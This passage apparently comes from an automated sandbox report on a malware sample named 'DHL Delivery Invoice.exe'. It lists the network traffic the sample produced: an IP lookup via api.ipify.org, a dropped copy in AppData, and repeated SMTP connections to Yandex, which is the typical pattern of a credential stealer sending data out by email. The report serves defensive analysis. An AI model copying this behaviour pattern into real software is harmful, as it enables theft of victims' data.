                                                                                                                                Nov 27, 2024 19:19:28.046001911 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.046036005 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.046075106 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.046086073 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.046184063 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.046195030 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.046205997 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.046283007 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.168493986 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.168555021 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.168591022 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.168620110 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.168648958 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.168718100 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.168768883 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.168797970 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.168832064 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.168879986 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.200130939 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.230212927 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.230361938 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.295260906 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.295275927 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.295500994 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.295543909 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.295752048 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.295793056 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.295902967 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.295991898 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.296008110 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.296031952 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.296156883 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.456401110 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.456418991 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.456492901 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.456512928 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.456554890 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.456604004 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.456613064 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.456645966 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.456727028 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.456775904 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.456779957 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.456882954 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.456902981 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.456958055 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.456970930 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.456970930 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.458704948 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.577090979 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.577195883 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.577197075 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.577318907 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.697495937 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.697616100 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.697763920 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.698542118 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.821310043 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.821398020 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.821517944 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.821573019 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.821592093 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.821650982 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.821806908 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.821876049 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.862776995 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.862854958 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.951076984 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:28.951163054 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.951277971 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:28.951354980 CET50034587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:29.063149929 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.075735092 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.075875998 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.106318951 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:29.195816040 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.195858955 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.195894957 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.195924044 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.195966005 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.195993900 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.196021080 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.196048975 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.196075916 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.196109056 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.196135998 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.315777063 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.315792084 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.315809011 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.315818071 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.315859079 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.315869093 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.315934896 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.316016912 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.316025972 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.316061974 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.316097975 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.410415888 CET5875003377.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.410487890 CET50033587192.168.2.477.88.21.158
                                                                                                                                Nov 27, 2024 19:19:29.435653925 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.435702085 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.435735941 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.435805082 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.435832977 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:29.435863972 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:30.274667025 CET5875003477.88.21.158192.168.2.4
                                                                                                                                Nov 27, 2024 19:19:30.326585054 CET50034587192.168.2.477.88.21.158

                                                                                                                                UDP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Nov 27, 2024 19:15:14.775259018 CET6151253192.168.2.41.1.1.1
                                                                                                                                Nov 27, 2024 19:15:14.952023029 CET53615121.1.1.1192.168.2.4
                                                                                                                                Nov 27, 2024 19:15:17.442326069 CET4983253192.168.2.41.1.1.1
                                                                                                                                Nov 27, 2024 19:15:18.310247898 CET53498321.1.1.1192.168.2.4

                                                                                                                                DNS Queries

                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                Nov 27, 2024 19:15:14.775259018 CET192.168.2.41.1.1.10xb321Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                Nov 27, 2024 19:15:17.442326069 CET192.168.2.41.1.1.10xacaeStandard query (0)smtp.yandex.comA (IP address)IN (0x0001)false

                                                                                                                                DNS Answers

                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                Nov 27, 2024 19:15:14.952023029 CET1.1.1.1192.168.2.40xb321No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                Nov 27, 2024 19:15:14.952023029 CET1.1.1.1192.168.2.40xb321No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                Nov 27, 2024 19:15:14.952023029 CET1.1.1.1192.168.2.40xb321No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                Nov 27, 2024 19:15:18.310247898 CET1.1.1.1192.168.2.40xacaeNo error (0)smtp.yandex.comsmtp.yandex.ruCNAME (Canonical name)IN (0x0001)false
                                                                                                                                Nov 27, 2024 19:15:18.310247898 CET1.1.1.1192.168.2.40xacaeNo error (0)smtp.yandex.ru77.88.21.158A (IP address)IN (0x0001)false

                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                • api.ipify.org

                                                                                                                                HTTPS Proxied Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.449733104.26.12.2054432032C:\Users\user\Desktop\DHL Delivery Invoice.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-27 18:15:16 UTC155OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                Host: api.ipify.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-11-27 18:15:16 UTC424INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 27 Nov 2024 18:15:16 GMT
                                                                                                                                Content-Type: text/plain
                                                                                                                                Content-Length: 11
                                                                                                                                Connection: close
                                                                                                                                Vary: Origin
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8e941a48caeb0fa1-EWR
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1492&min_rtt=1487&rtt_var=569&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=769&delivery_rate=1903520&cwnd=252&unsent_bytes=0&cid=30fdcb6e3cc14057&ts=522&x=0"
                                                                                                                                2024-11-27 18:15:16 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                                                                                Data Ascii: 8.46.123.75


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.449737104.26.12.2054437436C:\Users\user\AppData\Roaming\LIWBHGsz.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-27 18:15:20 UTC155OUTGET / HTTP/1.1
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                Host: api.ipify.org
                                                                                                                                Connection: Keep-Alive
                                                                                                                                2024-11-27 18:15:21 UTC424INHTTP/1.1 200 OK
                                                                                                                                Date: Wed, 27 Nov 2024 18:15:21 GMT
                                                                                                                                Content-Type: text/plain
                                                                                                                                Content-Length: 11
                                                                                                                                Connection: close
                                                                                                                                Vary: Origin
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8e941a6508730cb2-EWR
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1560&rtt_var=588&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1871794&cwnd=146&unsent_bytes=0&cid=21241de9939ceb74&ts=533&x=0"
                                                                                                                                2024-11-27 18:15:21 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                                                                                                                Data Ascii: 8.46.123.75


                                                                                                                                SMTP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                Nov 27, 2024 19:15:19.784538984 CET5874973577.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-23.myt.yp-c.yandex.net Ok 1732731319-JFea5f0OeSw0
                                                                                                                                Nov 27, 2024 19:15:19.788817883 CET49735587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:15:20.241609097 CET5874973577.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-23.myt.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:15:20.241791964 CET49735587192.168.2.477.88.21.158STARTTLS
                                                                                                                                Nov 27, 2024 19:15:20.700320005 CET5874973577.88.21.158192.168.2.4220 Go ahead
                                                                                                                                Nov 27, 2024 19:15:23.552289963 CET5874973877.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-39.klg.yp-c.yandex.net Ok 1732731323-MFem4i0OjmI0
                                                                                                                                Nov 27, 2024 19:15:23.554558992 CET49738587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:15:24.041109085 CET5874973877.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-39.klg.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:15:24.041301966 CET49738587192.168.2.477.88.21.158STARTTLS
                                                                                                                                Nov 27, 2024 19:15:24.642561913 CET5874973877.88.21.158192.168.2.4220 Go ahead
                                                                                                                                Nov 27, 2024 19:16:35.989707947 CET5874982077.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-36.sas.yp-c.yandex.net Ok 1732731395-ZGeSll0OkKo0
                                                                                                                                Nov 27, 2024 19:16:35.989877939 CET49820587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:16:36.458970070 CET5874982077.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-36.sas.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:16:36.460949898 CET49820587192.168.2.477.88.21.158STARTTLS
                                                                                                                                Nov 27, 2024 19:16:36.917356968 CET5874982077.88.21.158192.168.2.4220 Go ahead
                                                                                                                                Nov 27, 2024 19:16:54.006361008 CET5874985777.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-23.myt.yp-c.yandex.net Ok 1732731413-rGePZf0OqmI0
                                                                                                                                Nov 27, 2024 19:16:54.007723093 CET49857587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:16:54.572233915 CET5874985777.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-23.myt.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:16:54.572470903 CET49857587192.168.2.477.88.21.158STARTTLS
                                                                                                                                Nov 27, 2024 19:16:55.084091902 CET5874985777.88.21.158192.168.2.4220 Go ahead
                                                                                                                                Nov 27, 2024 19:17:05.782105923 CET5874988277.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-54.vla.yp-c.yandex.net Ok 1732731425-5HeJIo0OeW20
                                                                                                                                Nov 27, 2024 19:17:05.782222986 CET49882587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:17:06.368886948 CET5874988277.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-54.vla.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:17:06.371643066 CET49882587192.168.2.477.88.21.158STARTTLS
                                                                                                                                Nov 27, 2024 19:17:06.877026081 CET5874988277.88.21.158192.168.2.4220 Go ahead
                                                                                                                                Nov 27, 2024 19:17:09.569925070 CET5874989177.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-10.sas.yp-c.yandex.net Ok 1732731429-9HeGUr0OnGk0
                                                                                                                                Nov 27, 2024 19:17:09.573782921 CET49891587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:17:10.028413057 CET5874989177.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-10.sas.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:17:10.028656960 CET49891587192.168.2.477.88.21.158STARTTLS
                                                                                                                                Nov 27, 2024 19:17:10.544131994 CET5874989177.88.21.158192.168.2.4220 Go ahead
                                                                                                                                Nov 27, 2024 19:17:25.494473934 CET5874992377.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-91.myt.yp-c.yandex.net Ok 1732731445-PHeuVX0Ol4Y0
                                                                                                                                Nov 27, 2024 19:17:25.494637966 CET49923587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:17:26.031265020 CET5874992377.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-91.myt.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:17:26.031404018 CET49923587192.168.2.477.88.21.158STARTTLS
                                                                                                                                Nov 27, 2024 19:17:26.490036964 CET5874992377.88.21.158192.168.2.4220 Go ahead
                                                                                                                                Nov 27, 2024 19:17:28.007865906 CET5874992977.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-84.vla.yp-c.yandex.net Ok 1732731447-RHeCbe0OgmI0
                                                                                                                                Nov 27, 2024 19:17:28.008336067 CET49929587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:17:28.477503061 CET5874992977.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-84.vla.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:17:28.478343010 CET49929587192.168.2.477.88.21.158STARTTLS
                                                                                                                                Nov 27, 2024 19:17:28.545458078 CET5874993277.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-10.sas.yp-c.yandex.net Ok 1732731448-SHeJbr0OniE0
                                                                                                                                Nov 27, 2024 19:17:28.546442986 CET49932587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:17:28.979640961 CET5874992977.88.21.158192.168.2.4220 Go ahead
                                                                                                                                Nov 27, 2024 19:17:29.008690119 CET5874993277.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-10.sas.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:17:29.010523081 CET49932587192.168.2.477.88.21.158STARTTLS
                                                                                                                                Nov 27, 2024 19:17:29.459299088 CET5874993277.88.21.158192.168.2.4220 Go ahead
                                                                                                                                Nov 27, 2024 19:17:32.368561029 CET5874994277.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-45.klg.yp-c.yandex.net Ok 1732731452-VHea1h0OdqM0
                                                                                                                                Nov 27, 2024 19:17:32.370347023 CET49942587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:17:32.832662106 CET5874994277.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-45.klg.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:17:32.833506107 CET49942587192.168.2.477.88.21.158STARTTLS
                                                                                                                                Nov 27, 2024 19:17:33.292459965 CET5874994277.88.21.158192.168.2.4220 Go ahead
                                                                                                                                Nov 27, 2024 19:17:35.433774948 CET5874994977.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-51.vla.yp-c.yandex.net Ok 1732731455-ZHenFr0OruQ0
                                                                                                                                Nov 27, 2024 19:17:35.433888912 CET49949587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:17:37.101612091 CET5874995577.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-57.myt.yp-c.yandex.net Ok 1732731456-aHeRKa0OcGk0
                                                                                                                                Nov 27, 2024 19:17:37.102360964 CET49955587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:17:37.561805010 CET5874995577.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-57.myt.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:17:37.561934948 CET49955587192.168.2.477.88.21.158STARTTLS
                                                                                                                                Nov 27, 2024 19:17:38.003779888 CET5874995577.88.21.158192.168.2.4220 Go ahead
                                                                                                                                Nov 27, 2024 19:17:41.871741056 CET5874996677.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-42.myt.yp-c.yandex.net Ok 1732731461-fHe12c0On4Y0
                                                                                                                                Nov 27, 2024 19:17:41.871886015 CET49966587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:17:42.325591087 CET5874996677.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-42.myt.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:17:42.326085091 CET49966587192.168.2.477.88.21.158STARTTLS
                                                                                                                                Nov 27, 2024 19:17:42.776951075 CET5874996677.88.21.158192.168.2.4220 Go ahead
                                                                                                                                Nov 27, 2024 19:17:46.994261026 CET5874997677.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-13.klg.yp-c.yandex.net Ok 1732731466-kHeV3p0OdeA0
                                                                                                                                Nov 27, 2024 19:17:46.994488955 CET49976587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:17:47.519277096 CET5874997677.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-13.klg.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:17:47.519428968 CET49976587192.168.2.477.88.21.158STARTTLS
                                                                                                                                Nov 27, 2024 19:17:47.977327108 CET5874997677.88.21.158192.168.2.4220 Go ahead
                                                                                                                                Nov 27, 2024 19:18:05.199739933 CET5875001677.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-39.vla.yp-c.yandex.net Ok 1732731484-4IeMvt0Op4Y0
                                                                                                                                Nov 27, 2024 19:18:05.200962067 CET50016587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:18:05.660665989 CET5875001677.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-39.vla.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
                                                                                                                                Nov 27, 2024 19:18:05.661135912 CET50016587192.168.2.477.88.21.158STARTTLS
                                                                                                                                Nov 27, 2024 19:18:06.116849899 CET5875001677.88.21.158192.168.2.4220 Go ahead
                                                                                                                                Nov 27, 2024 19:18:14.747334003 CET5875002677.88.21.158192.168.2.4220 mail-nwsmtp-smtp-production-main-81.vla.yp-c.yandex.net Ok 1732731494-EIegcg0OqeA0
                                                                                                                                Nov 27, 2024 19:18:14.747544050 CET50026587192.168.2.477.88.21.158EHLO 928100
                                                                                                                                Nov 27, 2024 19:18:15.195033073 CET5875002677.88.21.158192.168.2.4250-mail-nwsmtp-smtp-production-main-81.vla.yp-c.yandex.net
                                                                                                                                250-8BITMIME
                                                                                                                                250-PIPELINING
                                                                                                                                250-SIZE 53477376
                                                                                                                                250-STARTTLS
                                                                                                                                250-AUTH LOGIN PLAIN XOAUTH2
                                                                                                                                250-DSN
                                                                                                                                250 ENHANCEDSTATUSCODES
